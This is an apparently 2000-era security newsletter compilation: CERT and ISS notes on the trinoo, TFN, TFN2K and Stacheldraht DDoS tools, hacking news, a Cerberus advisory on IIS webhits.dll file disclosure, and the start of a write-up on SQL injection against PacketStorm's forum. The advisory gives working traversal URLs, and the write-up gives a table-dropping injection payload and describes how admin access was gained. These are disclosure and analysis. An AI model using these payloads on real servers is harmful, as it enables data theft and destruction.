(added DSIT Workshop paper and IN-99-05) Thursday, November 18, 1999 Overview We have received reports of intruders installing distributed denial of service tools. Tools we have encountered utilize distributed technology to create large networks of hosts capable of launching large coordinated packet flooding denial of service attacks. We have seen distributed tools installed on hosts that have been compromised due to exploitation of known vulnerabilities. In particular, we have seen vulnerabilities in various RPC services exploited. For more information see the following CERT Incident Notes: IN-99-04, Similar Attacks Using Various RPC Services IN-99-05, Systems Compromised Through a Vulnerability in am-utils Two of the tools we have seen are known as trinoo (or trin00) and tribe flood network (or TFN). These tools appear to be undergoing active development, testing, and deployment on the Internet. Descriptions Trinoo Tribe Flood Network Trinoo Trinoo is a distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. For more information about various UDP flood attacks, please see CERT Advisory CA-96.01. A trinoo network consists of a small number of servers, or masters, and a large number of clients, or daemons. A denial of service attack utilizing a trinoo network is carried out by an intruder connecting to a trinoo master and instructing that master to launch a denial of service attack against one or more IP addresses. The trinoo master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time. 1.intruder -------> master; destination port 27665/tcp 2.master -------> daemons; destination port 27444/udp 3.daemons -------> UDP flood to target with randomized destination ports The binary for the trinoo daemon contains IP addresses for one or more trinoo master. When the trinoo daemon is executed, the daemon announces it's availability by sending a UDP packet containing the string "*HELLO*" to it's programmed trinoo master IP addresses. daemon -------> masters; destination port 31335/udp The trinoo master stores a list of known daemons in an encrypted file named "..." in the same directory as the master binary. The trinoo master can be instructed to send a broadcast request to all known daemons to confirm availability. Daemons receiving the broadcast respond to the master with a UDP packet containing the string "PONG". 1.intruder -------> master; destination port 27665/tcp 2.master -------> daemons; destination port 27444/udp 3.daemons -------> master; destination port 31335/udp All communications to the master on port 27665/tcp require a password, which is stored in the daemon binary in encrypted form. All communications with the daemon on port 27444/udp require the UDP packet to contain the string "l44" (that's a lowercase L, not a one). The source IP addresses of the packets in a trinoo-generated UDP flood attack are not spoofed in versions of the tool we have seen. Future versions of the tool could implement IP source address spoofing. Regardless, a trinoo-generated denial of service attack will most likely appear to come from a large number of different source addresses. We have seen trinoo daemons installed under a variety of different names, but most commonly as ns http rpc.trinoo rpc.listen trinix rpc.irix irix Running strings against the daemon and master binaries produces output similar to this (we have replaced master IP address references in the daemon binary with X.X.X.X) trinoo daemon trinoo master socket ---v bind v1.07d2+f3+c recvfrom trinoo %s %s %s %s l44adsl aIf3YWfOhw.V. sock PONG 0nm1VNMXqRMyM *HELLO* 15:08:41 X.X.X.X Aug 16 1999 X.X.X.X trinoo %s [%s:%s] X.X.X.X bind read *HELLO* ... rest omitted ... Tribe Flood Network TFN, much like Trinoo, is a distributed tool used to launch coordinated denial of service attacks from many sources against one or more targets. In additional to being able to generate UDP flood attacks, a TFN network can also generate TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast (e.g., smurf) denial of service attacks. TFN has the capability to generate packets with spoofed source IP addresses. Please see the following CERT Advisories for more information about these types of denial of service attacks. CA-96.01, TCP SYN Flooding and IP Spoofing Attacks CA-98.01, "smurf" IP Denial of Service Attacks A denial of service attack utilizing a TFN network is carried out by an intruder instructing a client, or master, program to send attack instructions to a list of TFN servers, or daemons. The daemons then generate the specified type of denial of service attack against one or more target IP addresses. Source IP addresses and source ports can be randomized, and packet sizes can be altered. A TFN master is executed from the command line to send commands to TFN daemons. The master communicates with the daemons using ICMP echo reply packets with 16 bit binary values embedded in the ID field, and any arguments embedded in the data portion of packet. The binary values, which are definable at compile time, represent the various instructions sent between TFN masters and daemons. Use of the TFN master requires an intruder-supplied list of IP addresses for the daemons. Some reports indicate recent versions of TFN master may use blowfish encryption to conceal the list of daemon IP addresses. Reports also indicate that TFN may have remote file copy (e.g., rcp) functionality, perhaps for use for automated deployment of new TFN daemons and/or software version updating in existing TFN networks. We have seen TFN daemons installed on systems using the filename td. Running strings on the TFN daemon binary produces output similar to this. %d.%d.%d.%d ICMP Error sending syn packet. tc: unknown host 3.3.3.3 mservers randomsucks skillz rm -rf %s ttymon rcp %s@%s:sol.bin %s nohup ./%s X.X.X.X X.X.X.X lpsched sicken in.telne Solutions Distributed attack tools leverage bandwidth from multiple systems on diverse networks to produce very potent denial of service attacks. To a victim, an attack may appear to come from many different source addresses, whether or not IP source address spoofing is employed by the attacker. Responding to a distributed attack requires a high degree of communication between Internet sites. Prevention is not straight forward because of the interdependency of site security on the Internet; the tools are typically installed on compromised systems that are outside of the administrative control of eventual denial of service attack targets. There are some basic suggestions we can make regarding distributed denial of service attacks: Prevent installation of distributed attack tools on your systems Remain current with security-related patches to operating systems and applications software. Follow security best-practices when administrating networks and systems. Prevent origination of IP packets with spoofed source addresses For a discussion of network ingress filtering, refer to RFC 2267, Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing Monitor your network for signatures of distributed attack tools Sites using intrusion detection systems (e.g., IDS) may wish to establish patterns to look for that might indicate trinoo or TFN activity based on the communications between master and daemon portions of the tools. Sites who use pro-active network scanning may wish to include tests for installed daemons and/or masters when scanning systems on your network. if you find a distributed attack tool on your systems It is important to determine the role of the tools installed on your system. The piece you find may provide information that is useful in locating and disabling other parts of distributed attack networks. We encourage you to identify and contact other sites involved. If you are involved in a denial of service attack Due to the potential magnitude of denial of service attacks generated by distributed networks of tools, the target of an attack may be unable to rely on Internet connectivity for communications during an attack. Be sure your security policy includes emergency out-of-band communications procedures with upstream network operators or emergency response teams in the event of a debilitating attack. In November 1999, experts addressed issues surrounding distributed-systems intruder tools. The DSIT Workshop produced a paper where workshop participants examine the use of distributed-system intruder tools and provide information about protecting systems from attack by the tools, detecting the use of the tools, and responding to attacks. Results of the Distributed-Systems Intruder Tools Workshop Acknowledgments The CERT/CC would like to acknowledge and thank our constituency and our peers for important contributions to the information used in this Incident Note. This document is available from: http://www.cert.org/incident_notes/IN-99-07.html Articles of interest: Characterizing and Tracing Packet Floods Using Cisco Routers http://www.cisco.com/warp/public/707/22.html Improving Security on Cisco Routers http://www.cisco.com/warp/public/707/21.html Internet Security Advisories: http://www.cisco.com/warp/public/707/advisory.html Additional info, ISS advisory on Trinoo/Tribe variants: -----BEGIN PGP SIGNED MESSAGE----- ISS Security Alert February 9, 2000 Denial of Service Attack using the TFN2K and Stacheldraht programs Synopsis: A new form of Distributed Denial of Service (DDoS) attack has been discovered following the release of the trin00 and Tribe Flood Network (TFN) denial of service programs (see December 7, 1999 ISS Security Alert at http://xforce.iss.net/alerts/advise40.php3). These attacks are more powerful than any previous denial of service attack observed on the Internet. A Distributed Denial of Service attack is designed to bring a network down by flooding target machines with large amounts of traffic. This traffic can originate from many compromised machines, and can be managed remotely using a client program. ISS X-Force considers this attack a high risk since it can potentially impact a large number of organizations. DDoS attacks have proven to be successful and are difficult to defend against. Description: Over the last two months, several high-capacity commercial and educational networks have been affected by DDoS attacks. In addition to the trin00 and TFN attacks, two additional tools are currently being used to implement this attack: TFN2K and Stacheldraht. Both of these tools are based on the original TFN/trin00 attacks described in the December ISS Security Alert. Attackers can install one of these DDoS programs (trin00, TFN, TFN2K, or Stacheldraht) on hundreds of compromised machines and direct this network of machines to initiate an attack against single or multiple victims. This attack occurs simultaneously from these machines, making it more dangerous than any DoS attack launched from a single machine. Technical Information: TFN2K: The TFN2K distributed denial of service system consists of a client/server architecture. The Client: The client is used to connect to master servers, which can then perform specified attacks against one or more victim machines. Commands are sent from the client to the master server within the data fields of ICMP, UDP, and TCP packets. The data fields are encrypted using the CAST algorithm and base64 encoded. The client can specify the use of random TCP/UDP port numbers and source IP addresses. The system can also send out "decoy" packets to non-target machines. These factors make TFN2K more difficult to detect than the original TFN program. The Master Server: The master server parses all UDP, TCP, and ICMP echo reply packets for encrypted commands. The master server does not use a default password when it is selected by the user at compile time. The Attack: The TFN2K client can be used to send various commands to the master for execution, including commands to flood a target machine or set of target machines within a specified address range. The client can send commands using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. Possible methods for detection of these flooding attacks are recommended in the TFN/trin00 December 7, 1999 ISS Security Alert. TFN2K can also be used to execute remote commands on the master server and bind shells to a specified TCP port. TFN2K runs on Linux, Solaris, and Windows platforms. Stacheldraht (Barbed Wire): Stacheldraht consists of three parts: the master server, client, and agent programs. The Client: The client is used to connect to the master server on port 16660 or port 60001. Packet contents are blowfish encrypted using the default password "sicken", which can be changed by editing the Stacheldraht source code. After entering the password, an attacker can use the client to manage Stacheldraht agents, IP addresses of attack victims, lists of master servers, and to perform DoS attacks against specified machines. The Master Server: The master server handles all communication between client and agent programs. It listens for connections from the client on port 16660 or 60001. When a client connects to the master, the master waits for the password before returning information about agent programs to the client and processing commands from the client. The Agent: The agent listens for commands from master servers on port 65000. In addition to this port, master server/agent communications are also managed using ICMP echo reply packets. These packets are transmitted and replied to periodically. They contain specific values in the ID field (such as 666, 667, 668, and 669) and corresponding plaintext strings in the data fields (including "skillz", "ficken", and "spoofworks"). The ICMP packets act as a "heartbeat" between agent and master server, and to determine source IP spoofing capabilities of the master server. The agent identifies master servers using an internal address list, and an external encrypted file containing master server IP addresses. Agents can be directed to "upgrade" themselves by downloading a fresh copy of the agent program and deleting the old image as well as accepting commands to execute flood attacks against target machines. The Attack: Like TFN/TFN2K, Stacheldraht can be used to perform ICMP, SYN, and UDP flood attacks. The attacks can run for a specified duration, and SYN floods can be directed to a set of specified ports. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. Possible methods for detection of these flooding attacks are discussed in the TFN/trin00 ISS Security Alert published December 7, 1999. Stacheldraht runs on Linux and Solaris machines. Detecting TFN2K/Stacheldraht related attacks: ISS SAFEsuite intrusion detection solution, RealSecure, detects the Denial of Service attacks that these distributed tools use, providing early warning and response capabilities. RealSecure can reconfigure firewalls and routers to block the traffic. On some firewalls this can be as granular as blocking a particular service or protocol port. In conjunction with the December 7, 1999 ISS Security Alert, RealSecure 3.2.1 included signatures to detect the communications between the distributed components of TFN and trin00. RealSecure will add signatures to detect TFN2K and Stacheldraht in its next release, which will also include an X-press Update capability to speed future signature deployment. Additional Information: ISS worked in coordination with CERT, SANS, and the NIPC. The following is additional information regarding these DDoS attacks: - - Advisory CA-2000-01 Denial-of-Service Developments http://www.cert.org/advisories/CA-2000-01.html - - SANS Network Security Digest Vol. 4 No. 1 - January 17, 2000 - - http://www.fbi.gov/nipc/trinoo.htm - - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis About ISS ISS is a leading global provider of security management solutions for e-business. By offering best-of-breed SAFEsuite(tm) security software, comprehensive ePatrol(tm) monitoring services, and industry-leading expertise, ISS serves as its customers' trusted security provider protecting digital assets and ensuring the availability, confidentiality and integrity of computer systems and information critical to e-business success. ISS' security management solutions protect more than 5,000 customers including 21 of the 25 largest U.S. commercial banks, 9 of the 10 largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe and Latin America. For more information, visit the ISS Web site at www.iss.net or call 888-901-7477. Copyright (c) 2000 by Internet Security Systems, Inc. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server. Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBOKHygjRfJiV99eG9AQGLhQP+L2H4KNHtP2Tl9YT3P5OIkbSrIszC8lW/ iDM8+6wkz0POcjNDXNHNDpVb203Yv+tjdBu/q6cP7QYVeZ9PUElUfXcN6a4bJTpH OOaARlvyPRFiArxvFgdIbypsFhTWxc4blJOMb8rbBZgzEa7pZiBzZQibN54l3E1A vg77CCVq3W8= =sMAK -----END PGP SIGNATURE----- @HWA 09.0 Teen charged with hacking ~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm Student charged with hacking Fugitive: Prosecutors say he broke into Palo Alto firm, then fled to Bulgaria. BY HOWARD MINTZ Mercury News Staff Writer A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers. In the government's latest attempt to hunt down a computer hacker, federal prosecutors brought charges against Peter Iliev Pentchev, a 22-year-old native of Bulgaria who is believed to have fled the United States after school officials confronted him about his computer activities. According to the U.S. Attorney's office in San Jose, Pentchev left the country in late 1998, shortly after the alleged hacking incident occurred. Law enforcement officials believe Pentchev went to Bulgaria and were unclear Wednesday what diplomatic obstacles there may be to returning him to this country to face charges. The four-count indictment charges Pentchev with violating federal computer laws by hacking into an undisclosed Palo Alto company between Nov. 20 and Dec. 19, 1998, stealing at least 1,800 credit card numbers, as well as user names and passwords of that company's customers. The indictment does not specify the company, and federal officials declined to name it. But Assistant U.S. Attorney Mavis Lee, who is prosecuting the case, said the hacking incident shut down one of the company's Web servers for five days and caused enough chaos in its database that it cost the firm more than $100,000 to restore its security system. Authorities have no evidence that Pentchev used the credit card numbers to commit fraud. Federal law-enforcement officials do not believe there is a link between Pentchev and a computer intruder who earlier this month attempted to extort $100,000 from Internet music retailer CD Universe, claiming to have stolen as many as 300,000 credit card numbers. The alleged extortionist was suspected of operating somewhere in Eastern Europe. That hacker began posting more than 25,000 allegedly stolen card numbers on a web site Christmas Day. The site eventually was shut down, and thousands of customers who had shopped at CD Universe canceled their cards. In the Bay Area case, investigators said they were able to trace the computer intrusion to Pentchev because he left evidence in log files in the company's computer system. ``He wasn't careful about mopping up after himself,'' Lee said. Princeton University officials confronted Pentchev about the allegations in December 1998, and he disappeared shortly thereafter. If convicted, Pentchev faces a maximum penalty of 17 years in prison. Contact Howard Mintz at hmintz@sjmercury.com or (408) 286-0236. @HWA 10.0 Major security flaw found on Microsoft product ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exclusive: Major security flaw hits Microsoft http://www.zdnet.co.uk/news/2000/3/ns-12942.html Thu, 27 Jan 2000 17:03:47 GMT Will Knight More embarrassment for Microsoft security as yet another flaw is discovered. Will Knight brings you this exclusive report A British security expert claims to have uncovered a major security flaw in Microsoft's Web server software, Internet Information Server 4 (IIS). David Litchfield a Windows NT specialist with British firm Cerberus Information Security, says the latest exploit against a Microsoft product allows a malicious hacker to gain unauthorised access to sensitive files, including cached or stored credit card details, address information, user IDs and passwords. Of most concern is the way these details can be seized: typing a simple URL into any browser makes it possible to gain access to files on Web servers running IIS, that have not been specifically configured to disable the exploit. According to Litchfield, the situation is serious. "It takes no expertise [to use this technique] at all. It's so easy to exploit, I dare not give out a specific example. It would just fall into the hands of script kiddies [a copycat who uses someone else's techniques to hack a system]." ZDNet UK News has a copy of the exploit technique. Thousands of e-commerce Web sites use IIS prompting Litchfield to warn a number of high profile UK e-commerce sites he believed were vulnerable. Last year Microsoft suffered a major PR blow when its Hotmail service -- the world's leading Web based email service -- was left open to attack by a similarly simple hacking technique. But it is not just Microsoft's products that are vulnerable to attack: there have been several security breaches of high-profile e-commerce Web sites illustrating the precarious nature of the fledgling technology. Visa, for example, recently confirmed receiving ransom demands from individuals claiming to be able to bring down their computer system. E-commerce Web site CDUniverse was also struck by a computer hacker who stole hundreds of credit card numbers and published them on the Internet. Mark Tennant, Microsoft product manager for NT Server told ZDNet UK News, Thursday that although Microsoft products had made headlines recently for its security flaws, it was to be expected. "This product is a mainstream product with millions of users, obviously with that many users flaws are more likely to be picked up." Ostensibly that might be true, but to observers, those who see Microsoft products hacked time and again, isn't it a worrying pattern? Tennant disagrees and drew comparisons with Linux "which doesn't have millions of users so you therefore don't hear of this type of issue". He added: "Microsoft is completely committed to security." Asked if that commitment could guarantee Windows 2000 -- NT's big brother due next month -- would not suffer the same sort of security flaws as its predecessor Tennant said: "I cannot predict what could happen a month down a line... but we are committed to security." Litchfield suggests the pressure put on organisations to get online, by both government and software houses has led to companies leaving themselves wide open to computer criminals. "The World Wide Web is a hacker's paradise," he remarks. "The lure of e-commerce as an effective channel to further promote a business and fuel its success has led to too many companies getting 'connected' too quickly, sacrificing security for speed." Security consultant Neil Barrett from another security firm, UK Information Risk Management, agrees: "The Holy Grail to any hacker is the remote access exploit. In the past problems with IIS have mainly been denial of service. If this exploit does what it says it does, it's down to how well credit card details are protected on a system which we know from experience is not very well at all." As a first defence Barrett advises either an intrusion detection system or encryption or ideally "both". Full details of the exploit are available from the Cerberus Web site at this address:http://www.cerberus-infosec.co.uk/adviishtw.html and a patch for Internet Information Server 4 may be downloaded from the Microsoft security home page. What do you think? Tell the Mailroom. And read what others have said. @HWA 11.0 Cerberus Information Security Advisory (CISADV000126) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: win2k security list Date: Jan 26th Cerberus Information Security Advisory (CISADV000126) http://www.cerberus-infosec.co.uk/advisories.html Released : 26th January 2000 Name : Webhits.dll buffer truncation Affected Systems: Microsoft Windows NT 4 running Internet Information Server 4 All service Packs Issue : Attackers can access files outside of the web virtual directory system and view ASP source Author : David Litchfield (mnemonix@globalnet.co.uk) Microsoft Advisory : http://www.microsoft.com/technet/security/bulletin/ms00-006.asp Internet Information Server 4.0 ships with an ISAPI application webhits.dll that provides hit-highlighting functionality for Index Server. Files that have the extention .htw are dispatched by webhits.dll. A vulnerability exists in webhits however that allows an attacker to break out of the web virtual root file system and gain unathorized access to other files on the same logical disk drive, such as customer databases, log files or any file they know or can ascertain the path to. The same vulnerability can be used to obtain the source of Active Server Pages or any other server side script file which often contain UserIDs and passwords as well as other sensitive information. *** WARNING **** Even if you have no .htw files on your system you're probably still vulnerable! A quick test to show if you are vulnerable: go to http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw If you receive a message stating the "format of the QUERY_STRING is invalid" you _are_ vulnerable. Cerberus Information Security's free vulnerability scanner - CIS - now contains a check for this issue - available from the website http://www.cerberus-infosec.co.uk/ *** WARNING **** Details ******* This vulnerability exploits two problems and for the sake of clarity this section will be spilt into two. 1) If you DO have .htw files on your system **************************************** The hit-highlighting functionality provided by Index Server allows a web user to have a document returned with their original search terms highlighted on the page. The name of the document is passed to the .htw file with the CiWebHitsFile argument. webhits.dll, the ISAPI application that deals with the request, opens the file highlights accordingly and returns the resulting page. Because the user has control of the CiWebHitsFile argument passed to the .htw file they can request pretty much anything they want. A secondary problem to this is the source of ASP and other scripted pages can be revealed too. However, webhits.dll will follow double dots and so an attacker is able to gain access to files outside of the web virtual root. For example to view the web access logs for a given day the attacker would build the following URL http://charon/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../win nt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Ful l Sample .htw files often installed and left on the system are /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /iishelp/iis/misc/iirturnh.htw (this .htw is normally restricted to loopback) 2) If you DON'T have any .htw files on your system ************************************************** To invoke the webhits.dll ISAPI application a request needs to be made to a .htw file but if you don't have any on your web server you might wonder why you are still vulnerable - requesting a non-existent .htw file will fail. The trick is to be able to get inetinfo.exe to invoke webhits.dll but then also get webhits.dll to access an existing file. We achevie this by crafting a special URL. First we need a valid resource. This must be a static file such as a .htm, .html, .txt or even a .gif or a .jpg. This will be the file opened by webhits.dll as the template file. Now we need to get inetinfo.exe to pass it along to webhits for dispatch and the only way we can do this is by requesting a .htw file. http://charon/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w 3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full will fail. Obviously. There is no such file on the system with that name. Notice we've now invoked webhits, however, and by placing a specific number of spaces (%20s) between the exisiting resource and the .htw it is then possible to trick the web service: The buffer that holds the name of the .htw file to open is truncated, causing the .htw part to be removed and therefore when it comes to webhits.dll attempting to open the file it succeeds and we are then returned the contents of the file we want to access without there actually being a real .htw file on the system. The code is probably doing something similar to this: FILE *fd; int DoesTemplateExist(char *pathtohtwfile) { // Just in case inetinfo.exe passes too long a string // let's make sure it's of a suitable length and not // going to open a buffer overrun vulnerability char *file; file = (char *)malloc(250); strncpy(file,pathtohtwfile,250); fd = fopen(file,"r"); // Success if(fd !=NULL) { return 1; } // failed else { return 0; } } Here webhits.dll "contains" a function called DoesTemplateExist() and is passed a pointer to a 260 byte long string buffer containing the path to the .htw file to open but this buffer is further reduced in length by the strncpy() function removing whatever was stored in the last ten bytes (in this case the .htw of the HTTP REQUEST_URI) so when fopen() is called it succeeds. This happens because Windows NT will ignore trailing spaces in a file name. Solution ******** .htw needs to be unassociated from webhits.dll To do this open the Internet Server Manager (MMC). In the left hand pane right click the computer you wish to administer and from the menu that pops up choose Properties. From the Master Properties select the WWW Service and then click Edit. The WWW Service Master properties window should open. From here click on the Home Directory tab and then click the Configuration button. You should be presented with an App Mappings tab in the Application Mappings window. Find the .htw extention and then highlight it then click on remove. If a confirmation window pops up selected Yes to remove. Finally click on Apply and select all of the child nodes this should apply to and then OK that. Now close all of the WWW Service property windows. About Cerberus Information Security, Ltd **************************************** Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the dicovery "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405 Permission is hereby granted to copy or redistribute this advisory but only in its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 12.0 "How I hacked Packetstorm Security" by Rainforest Puppy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -- Advisory RFP2K01 ------------------------------ rfp.labs ------------ "How I hacked PacketStorm" A look at hacking wwwthreads via SQL ------------------------------- rain forest puppy / rfp@wiretrip.net --- Table of contents: -1. Scope of problem -2. Long explaination of SQL hacking -3. Solution -4. Conclusion -5. Included perl scripts ------------------------------------------------------------------------ ----[ 1. Scope of problem Many applications are vulnerable to various forms of SQL hacking. While programs know they should avoid strcpy() and giving user data to a system() call, many are unaware of how SQL queries can be tampered with. This is more of a technical paper than an advisory, but it does explain how I used a vulnerability in the wwwthreads package to gain administrative access and some 800 passwords to PacketStorm's discussion forum. ----[ 2. Long explaination of SQL hacking As with any other day, I was surfing around the PacketStorm forums, which use wwwthreads. The URL parameters (the cruft after the '?' in an URL) of the forums started catching my eye. Being the web security puppy I am, I started getting curious. So using an ultra-insightful hacking technique, I changed the 'Board=general' parameter to read 'Board=rfp' used with the showpost.pl script. Lo and behold I get the following error given to me: We cannot complete your request. The reason reported was: Can't execute query: SELECT B_Main,B_Last_Post FROM rfp WHERE B_Number=1 . Reason: Table 'WWWThreads.rfp' doesn't exist Seeing there's also a 'Number=1' parameter, we can figure this query can be reconstructed as SELECT B_Main,B_Last_Post FROM $Board WHERE B_Number=$Number Now, if any of you have read my phrack 54 article (the SQL appension part, available at http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2) you can see where I'm going. We can not only substitute a $Board name and $Number, but also extra SQL commands. Imagine if $Board were to equal 'general; DROP TABLE general; SELECT * FROM general ' This would translate into SELECT B_Main,B_Last_Post FROM general; DROP TABLE general; SELECT * FROM general WHERE B_Number=$Number Now the ';' is generic for ending a command. Normally we could use a '#' for mySQL to ignore everything else on the line; however, the 'FROM' clause is on a separate line than the 'WHERE' clause, so mySQL won't ignore it. Considering that invalid SQL will cause mySQL to not run any commands, we at least need to give a valid command string to parse...in this case, we feed a generic select (similiar to the original) back to it. The result of this (theoretically) is to drop (delete) the general forum table. But in reality, it doesn't work. Not because the theory is wrong, but because the database user we're using doesn't have DROP privileges. And due to how wwwthreads is written, it won't quite let you do much with this. But all is not lost, we can just start changing all numbers left and right, looking for where it blows up...or we can go the easy route and download the (eval) source code from www.wwwthreads.com. Yeah, kind of cheating, but it's not quite a one-to-one solution. You see, the eval code and the license code (of which PacketStorm is running) are slightly different, including their SELECT statements. So we have to be a little creative. First, let's find the SELECT statement (or equivalent) that's featured above. I like to use less, so I just 'less showpost.pl', and search (the '/' key) for 'SELECT'. We come up with # Grab the main post number for this thread $query = qq! SELECT Main,Last_Post FROM $Board WHERE Number=$Number !; Wow, that's it..except the field names (Main,Last_Post,Number) are different than the pro version (B_Main,B_Last_Post,B_Number). If we look right above it, we see # Once and a while it people try to just put a number into the url, if (!$Number) { w3t::not_right("There was a problem looking up the Post... Which is what limits the use of the $Number parameter. At this point let's now evaluate 'why' we want to go forth into this. Obviously DROP'ing tables ranks right up there with other stupid DoS tricks. You may be able to modify other people's posts, but that's lame too. Perhaps setting up our own forum? All that information is stored in the DB. But that's a lot of records to update. How about becoming a moderator? Or even better, an administrator? Administrators can add, delete, and modify forums, boards, and users. That may be a worthy goal, although your still only limited to the realm of the forum, which makes you a king of a very small and pitiful domain. However, there is one thing worthy. If you make yourself a user account, you'll notice you have to enter a password. Hmmm...those passwords are stored someplace...like, in the database. If we hedge our 'password reuse' theory, and combined with the fact that wwwthreads (in some configurations) post the IP address of the poster, we have some possibilities worth checking out. So, let's look at this password thing. Going into 'edit profile' gives us a password field, which looks an awful lot like a crypt hash (view the HTML source). Damn, so the passwords are hashed. Well, that just means you'll need a password cracker and more time before you can start checking on password reuse. Assuming we *can* get the passwords...... Let's start with the administrator access first. The adduser.pl script is a good place to start, since it should show us all parameters of a user. Notice the following code # -------------------------------------- # Check to see if this is the first user $query = qq! SELECT Username FROM Users !; $sth = $dbh -> prepare ($query) or die "Query syntax error: $DBI::errstr. Query: $query"; $sth -> execute() or die "Can't execute query: $query. Reason: $DBI::errstr"; my $Status = ""; my $Security = $config{'user_security'}; my $rows = $sth -> rows; $sth -> finish; # ------------------------------------------------------- # If this is the first user, then status is Administrator # otherwise they are just get normal user status. if (!$rows){ $Status = "Administrator"; $Security = 100; } else { $Status = "User"; } What this does is look to see if any users are defined. If no users are defined, the first user added gets the Status of 'Administrator' and a security level of 100. After that, all added users just get Status=User. So we need to find a way to make our Status=Administrator. A full user record can be seen a little further down... # ------------------------------ # Put the user into the database my $Status_q = $dbh -> quote($Status); $Username_q = $dbh -> quote($Username); my $Email_q = $dbh -> quote($Email); my $Display_q = $dbh -> quote($config{'postlist'}); my $View_q = $dbh -> quote($config{'threaded'}); my $EReplies_q = $dbh -> quote("Off"); $query = qq! INSERT INTO Users (Username,Email,Totalposts,Laston,Status,Sort, Display,View,PostsPer,EReplies,Security,Registered) VALUES ($Username_q,$Email_q,0,$date,$Status_q,$config{'sort'}, $Display_q,$View_q,$config{'postsperpage'},$EReplies_q,$Security,$date) !; Now, I should take a moment here and explain the quote() function. A string value of "blah blah blah", when stuck into a query that looks like "SELECT * FROM table WHERE data=$data" will wind up looking like SELECT * FROM table WHERE data=blah blah blah which is not valid. The database doesn't know what to do with the extra two blah's, since they look like commands. Therefore all string data need to be encapsulated in single quotes ('). Therefore the query should look like SELECT * FROM table WHERE data='blah blah blah' which is correct. Now, in my SQL appension article I talk about 'breaking out' of the single quote string by including your own single quote. So if we submitted "blah blah' MORE SQL COMMANDS...", it would look like SELECT * FROM table WHERE data='blah blah' MORE SQL COMMANDS...' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ data we submitted This causes the SQL engine to interpret the MORE SQL COMMANDS as actual SQL commands, since if figured the 'data' part of the string ended with the second single quote (the one we submitted). This is a drawback of converting data into a 'human readable' string, to be parsed back into data again...it's hard to determine what's 'code/commands' and what's 'data'. All is not lost, however. By submitting a '', it tells the SQL engine to NOT end the data string, but rather only think of it as a single quote in the data context. Therefore the following query SELECT * FROM table WHERE data='data''more data' makes the database look for the value "data'more data". So to keep people from breaking out of strings and submitting extra SQL commands, all you have to do is double up every single quote (turn ' into ''). This will ensure that all data is indeed considered data. And this is what the DBI->quote() function does--it will put single quotes around the string, and double all single quotes in the string. So after all of that explaination, the short of it is that anything that is run through quote() is of no use to use, because we can't submit extra SQL commands or otherwise tamper with anything fun. And if you look, wwwthreads uses quote() extensively. So this may be rough. But all is not lost... You see, there are different field types. You can have strings, boolean values, various numeric values, etc. While a string field needs to be in the format of field='data', a numeric field doesn't use the '' (i.e. numeric_field='2' is invalid). The correct syntax for numeric fields in numeric_field=2. Ah ha! There's no quotes to deal with, and you can't even use quotes anyways. The correct solution is to make sure all numeric field data is indeed numeric (more on this later). But I'll give you a hint...wwwthreads doesn't go that far (nor do most applications, actually). So, now we need a SQL statement that preferably deals with a table we are interested in. A SELECT statement (retrieves data) is tougher, since we'll need to include a whole 'nother query to do something other than SELECT. INSERT and UPDATE are nice because we're already modifying data...we can just ride in more data to update (hopefully). Poking around brings us to a very nice 